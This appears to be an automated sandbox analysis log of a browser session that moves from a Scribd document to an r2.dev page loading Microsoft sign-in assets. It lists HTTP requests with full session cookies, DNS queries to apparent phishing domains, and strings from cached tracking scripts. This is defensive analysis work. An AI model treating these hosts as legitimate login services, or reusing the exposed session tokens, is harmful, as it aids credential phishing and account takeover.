    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c; _rdt_uuid=1733522373804.90ad4cc1-c7c0-404a-8932-712d98b9d875; IR_gbd=scribd.com; IR_14808=1733522374271%7C0%7C1733522374271%7C%7C; _uetsid=61d3cba0b41d11ef9aea290cc24698a9; _uetvid=61d42620b41d11ef884d05fafe2184f7; _ga=GA1.2.30215218.1733522367; _gid=GA1.2.830502526.1733522377; __ssid=88cc5efd775d85316f8301f58ee373f; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.1.1733522381.46.0.0; _ga_Z4ZC50DED6=GS1.1.1733522367.1.1.1733522381.46.0.0; _fbp=fb.1.1733522382001.679305698926452788; _tt_enable_cookie=1; _ttp=M5jx_JzCNLWicY7qEO5VYLqIGGL.tt.1
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c; _rdt_uuid=1733522373804.90ad4cc1-c7c0-404a-8932-712d98b9d875; IR_gbd=scribd.com; IR_14808=1733522374271%7C0%7C1733522374271%7C%7C; _uetsid=61d3cba0b41d11ef9aea290cc24698a9; _uetvid=61d42620b41d11ef884d05fafe2184f7; _ga=GA1.2.30215218.1733522367; _gid=GA1.2.830502526.1733522377; __ssid=88cc5efd775d85316f8301f58ee373f; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.1.1733522381.46.0.0; _ga_Z4ZC50DED6=GS1.1.1733522367.1.1.1733522381.46.0.0; _fbp=fb.1.1733522382001.679305698926452788; _tt_enable_cookie=1; _ttp=M5jx_JzCNLWicY7qEO5VYLqIGGL.tt.1
    Source: chromecache_206.2.drString found in binary or memory: "https://www.facebook.com/StripeHQ", equals www.facebook.com (Facebook)
    Source: chromecache_206.2.drString found in binary or memory: "https://www.linkedin.com/company/stripe/", equals www.linkedin.com (Linkedin)
    Source: chromecache_162.2.dr, chromecache_235.2.dr, chromecache_173.2.dr, chromecache_247.2.drString found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},Bk:function(){e=qb()},zd:function(){d()}}};var Xb=xa(["data-gtm-yt-inspected-"]),LD=["www.youtube.com","www.youtube-nocookie.com"],MD,ND=!1; equals www.youtube.com (Youtube)
    Source: chromecache_270.2.dr, chromecache_162.2.dr, chromecache_235.2.dr, chromecache_193.2.dr, chromecache_173.2.dr, chromecache_247.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=rB(a,c,e);U(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return U(122),!0;if(d&&f){for(var m=Bb(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},uB=function(){var a=[],b=function(c){return fb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
    Source: chromecache_162.2.dr, chromecache_235.2.dr, chromecache_173.2.dr, chromecache_247.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Dh:e,Bh:f,Ch:g,ji:k,ki:m,Re:n,Jb:b},q=B.YT;if(q)return q.ready&&q.ready(d),b;var r=B.onYouTubeIframeAPIReady;B.onYouTubeIframeAPIReady=function(){r&&r();d()};H(function(){for(var u=E.getElementsByTagName("script"),v=u.length,t=0;t<v;t++){var w=u[t].getAttribute("src");if(WD(w,"iframe_api")||WD(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!ND&&UD(x[A],p.Re))return oc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
    Source: chromecache_217.2.dr, chromecache_262.2.drString found in binary or memory: m reading {{props_document_collection_name}} on Scribd: {{props_document_collection_url}}\",\"read_props_document_collection_name_on_scribd\":\"Read {{props_document_collection_name}} on Scribd\",\"share_on_facebook\":\"Share on Facebook\",\"share_on_facebook_opens_a_new\":\"Share on Facebook, opens a new window\",\"share_on_linkedin\":\"Share on LinkedIn\",\"share_on_linkedin_opens_a_new\":\"Share on LinkedIn, opens a new window\",\"share_on_twitter\":\"Share on Twitter\",\"share_on_twitter_opens_a_new\":\"Share on Twitter, opens a new window\",\"share_with_email\":\"Share with Email\",\"share_with_email_opens_mail_client\":\"Share with Email, opens mail client\",\"sharing_options\":\"Sharing Options\"}},\"reading_progress\":{\"base\":{\"we_ve_moved_you_to_where_you\":\"We\'ve moved you to where you read on your {{progress_device_name}}\"}},\"renew_upgrade_modal\":{\"please_renew_your_subscription_first_in\":\"Please renew your subscription first in order to upgrade to Plus to unlock this title.\",\"renew_and_upgrade_to_unlock\":\"Renew and upgrade to unlock this title\",\"renew_subscription\":\"Renew subscription\"},\"resume_membership\":\"Resume subscription\",\"save_button\":{\"save\":\"Save\",\"saved\":\"Saved\"},\"sharing_buttons\":{\"hi_there_document_action_and_thought_you\":\"Hi there, {{document_action}} and thought you might like it. {{document_title}} by {{document_author_or_publisher_name_or_login}} {{doc_url}} Scribd gives you monthly access to books, audiobooks, and more - for less than the cost of a paperback. Join today and {{trial_cta_downcase}}. Find out more at: http://www.scribd.com/\",\"i_m_reading_document_title_on_suffix\":\"I equals www.facebook.com (Facebook)
    Source: chromecache_217.2.dr, chromecache_262.2.drString found in binary or memory: m reading {{props_document_collection_name}} on Scribd: {{props_document_collection_url}}\",\"read_props_document_collection_name_on_scribd\":\"Read {{props_document_collection_name}} on Scribd\",\"share_on_facebook\":\"Share on Facebook\",\"share_on_facebook_opens_a_new\":\"Share on Facebook, opens a new window\",\"share_on_linkedin\":\"Share on LinkedIn\",\"share_on_linkedin_opens_a_new\":\"Share on LinkedIn, opens a new window\",\"share_on_twitter\":\"Share on Twitter\",\"share_on_twitter_opens_a_new\":\"Share on Twitter, opens a new window\",\"share_with_email\":\"Share with Email\",\"share_with_email_opens_mail_client\":\"Share with Email, opens mail client\",\"sharing_options\":\"Sharing Options\"}},\"reading_progress\":{\"base\":{\"we_ve_moved_you_to_where_you\":\"We\'ve moved you to where you read on your {{progress_device_name}}\"}},\"renew_upgrade_modal\":{\"please_renew_your_subscription_first_in\":\"Please renew your subscription first in order to upgrade to Plus to unlock this title.\",\"renew_and_upgrade_to_unlock\":\"Renew and upgrade to unlock this title\",\"renew_subscription\":\"Renew subscription\"},\"resume_membership\":\"Resume subscription\",\"save_button\":{\"save\":\"Save\",\"saved\":\"Saved\"},\"sharing_buttons\":{\"hi_there_document_action_and_thought_you\":\"Hi there, {{document_action}} and thought you might like it. {{document_title}} by {{document_author_or_publisher_name_or_login}} {{doc_url}} Scribd gives you monthly access to books, audiobooks, and more - for less than the cost of a paperback. Join today and {{trial_cta_downcase}}. Find out more at: http://www.scribd.com/\",\"i_m_reading_document_title_on_suffix\":\"I equals www.linkedin.com (Linkedin)
    Source: chromecache_217.2.dr, chromecache_262.2.drString found in binary or memory: m reading {{props_document_collection_name}} on Scribd: {{props_document_collection_url}}\",\"read_props_document_collection_name_on_scribd\":\"Read {{props_document_collection_name}} on Scribd\",\"share_on_facebook\":\"Share on Facebook\",\"share_on_facebook_opens_a_new\":\"Share on Facebook, opens a new window\",\"share_on_linkedin\":\"Share on LinkedIn\",\"share_on_linkedin_opens_a_new\":\"Share on LinkedIn, opens a new window\",\"share_on_twitter\":\"Share on Twitter\",\"share_on_twitter_opens_a_new\":\"Share on Twitter, opens a new window\",\"share_with_email\":\"Share with Email\",\"share_with_email_opens_mail_client\":\"Share with Email, opens mail client\",\"sharing_options\":\"Sharing Options\"}},\"reading_progress\":{\"base\":{\"we_ve_moved_you_to_where_you\":\"We\'ve moved you to where you read on your {{progress_device_name}}\"}},\"renew_upgrade_modal\":{\"please_renew_your_subscription_first_in\":\"Please renew your subscription first in order to upgrade to Plus to unlock this title.\",\"renew_and_upgrade_to_unlock\":\"Renew and upgrade to unlock this title\",\"renew_subscription\":\"Renew subscription\"},\"resume_membership\":\"Resume subscription\",\"save_button\":{\"save\":\"Save\",\"saved\":\"Saved\"},\"sharing_buttons\":{\"hi_there_document_action_and_thought_you\":\"Hi there, {{document_action}} and thought you might like it. {{document_title}} by {{document_author_or_publisher_name_or_login}} {{doc_url}} Scribd gives you monthly access to books, audiobooks, and more - for less than the cost of a paperback. Join today and {{trial_cta_downcase}}. Find out more at: http://www.scribd.com/\",\"i_m_reading_document_title_on_suffix\":\"I equals www.twitter.com (Twitter)
    Source: chromecache_179.2.dr, chromecache_270.2.dr, chromecache_193.2.dr, chromecache_308.2.drString found in binary or memory: return b}JD.F="internal.enableAutoEventOnTimer";var Xb=xa(["data-gtm-yt-inspected-"]),LD=["www.youtube.com","www.youtube-nocookie.com"],MD,ND=!1; equals www.youtube.com (Youtube)
    Source: chromecache_307.2.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(a){var b=new URL(a);b=b.hostname.endsWith(".facebook.com")&&b.pathname=="/signals/iwl.js";if(!b)throw new Error("Disallowed script URL");return a}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_307.2.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_307.2.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_270.2.dr, chromecache_162.2.dr, chromecache_235.2.dr, chromecache_193.2.dr, chromecache_173.2.dr, chromecache_247.2.drString found in binary or memory: var YC=function(a,b,c,d,e){var f=PA("fsl",c?"nv.mwt":"mwt",0),g;g=c?PA("fsl","nv.ids",[]):PA("fsl","ids",[]);if(!g.length)return!0;var k=UA(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);U(121);if(m==="https://www.facebook.com/tr/")return U(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!Az(k,Cz(b, equals www.facebook.com (Facebook)
    Source: global trafficDNS traffic detected: DNS query: www.scribd.com
    Source: global trafficDNS traffic detected: DNS query: cmp.osano.com
    Source: global trafficDNS traffic detected: DNS query: s-f.scribdassets.com
    Source: global trafficDNS traffic detected: DNS query: html.scribdassets.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: js.stripe.com
    Source: global trafficDNS traffic detected: DNS query: consent.api.osano.com
    Source: global trafficDNS traffic detected: DNS query: s.yimg.com
    Source: global trafficDNS traffic detected: DNS query: b-code.liadm.com
    Source: global trafficDNS traffic detected: DNS query: survey.survicate.com
    Source: global trafficDNS traffic detected: DNS query: wa.scribd.com
    Source: global trafficDNS traffic detected: DNS query: i.liadm.com
    Source: global trafficDNS traffic detected: DNS query: rp.liadm.com
    Source: global trafficDNS traffic detected: DNS query: static.ads-twitter.com
    Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
    Source: global trafficDNS traffic detected: DNS query: analytics.google.com
    Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: live.rezync.com
    Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
    Source: global trafficDNS traffic detected: DNS query: d.turn.com
    Source: global trafficDNS traffic detected: DNS query: dis.criteo.com
    Source: global trafficDNS traffic detected: DNS query: b1sync.zemanta.com
    Source: global trafficDNS traffic detected: DNS query: mid.rkdms.com
    Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
    Source: global trafficDNS traffic detected: DNS query: imgv2-1-f.scribdassets.com
    Source: global trafficDNS traffic detected: DNS query: imgv2-2-f.scribdassets.com
    Source: global trafficDNS traffic detected: DNS query: cdn.pdst.fm
    Source: global trafficDNS traffic detected: DNS query: www.redditstatic.com
    Source: global trafficDNS traffic detected: DNS query: analytics.tiktok.com
    Source: global trafficDNS traffic detected: DNS query: utt.impactcdn.com
    Source: global trafficDNS traffic detected: DNS query: browser.sentry-cdn.com
    Source: global trafficDNS traffic detected: DNS query: cdn.optimizely.com
    Source: global trafficDNS traffic detected: DNS query: pixel-config.reddit.com
    Source: global trafficDNS traffic detected: DNS query: pixels.spotify.com
    Source: global trafficDNS traffic detected: DNS query: m.stripe.network
    Source: global trafficDNS traffic detected: DNS query: cdn.siftscience.com
    Source: global trafficDNS traffic detected: DNS query: sp.analytics.yahoo.com
    Source: global trafficDNS traffic detected: DNS query: t.co
    Source: global trafficDNS traffic detected: DNS query: analytics.twitter.com
    Source: global trafficDNS traffic detected: DNS query: google.com
    Source: global trafficDNS traffic detected: DNS query: alb.reddit.com
    Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: sentry.io
    Source: global trafficDNS traffic detected: DNS query: m.stripe.com
    Source: global trafficDNS traffic detected: DNS query: doclinere.info
    Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: hexagon-analytics.com
    Source: global trafficDNS traffic detected: DNS query: stripe.com
    Source: global trafficDNS traffic detected: DNS query: tattle.api.osano.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: rphfymzrfvbgvnwbxgqz.constructappsolution.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
    Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
    Source: global trafficDNS traffic detected: DNS query: drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.com
    Source: global trafficDNS traffic detected: DNS query: office.com
    Source: global trafficDNS traffic detected: DNS query: drizzysamson.constructappsolution.com
    Source: global trafficDNS traffic detected: DNS query: www.office.com
    Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
    Source: global trafficDNS traffic detected: DNS query: w3-reporting-nel.reddit.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: unknownHTTP traffic detected: POST /csrf_token HTTP/1.1Host: www.scribd.comConnection: keep-aliveContent-Length: 94sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/document/801519291/Advice-NotificationAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/html; charset=utf-8Cache-Control: private, no-storeContent-Security-Policy: frame-ancestors 'self'Referrer-Policy: strict-origin-when-cross-originServer: envoySet-Cookie: _scribd_session=Mm9lTytWZW0rVk0vUkxQbWNiWGdkMFJhd3JVTFJVVlBGbGo3aEt3TEZNZmJqUVNDQ2pITzMrU3J5SWVNL0NaK241TTlpdGJmSWtWajBjOWxiYmRSY3BCYW9BVVppejEybU9xU1haK2ZNTUVlUEJsYTd2N3pEZHRhbDhOaDYzQVFqM1FKSzI5eG5WOStZMlhYVlB4bVpGZjBMUFIxVnlLZldLWTlwYmk0cmdkSm4rbFAxUU1ERzNtTXFXYVR3YlpxRTdoSEtzK2E4ak1wcHVqa3B2RjhteTdMUWJoSis1cGRlL0lrSEd0NmFnNVBuZjlKMzhWRmltRnNVQ0pYSjl4Y0w3MlhQenk2eDNYdVJOaHAzb2phU1Q3eCtORFc1ZmxzWTRqRzRvSVNTNW9OMjIzdHlSM0lUMVM4enRieDQxQ3gtLWc4WTZrZ2l5bWwyRmFrdGtyK1NDWUE9PQ%3D%3D--c830bea85a1d9383c20d057010114f968bca60c6; domain=.scribd.com; path=/; expires=Mon, 06 Dec 2027 21:59:29 GMT; secure; HttpOnlyStatus: 404 Not FoundX-Content-Type-Options: nosniffX-Download-Options: noopenX-Envoy-Upstream-Service-Time: 6X-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-Request-Id: 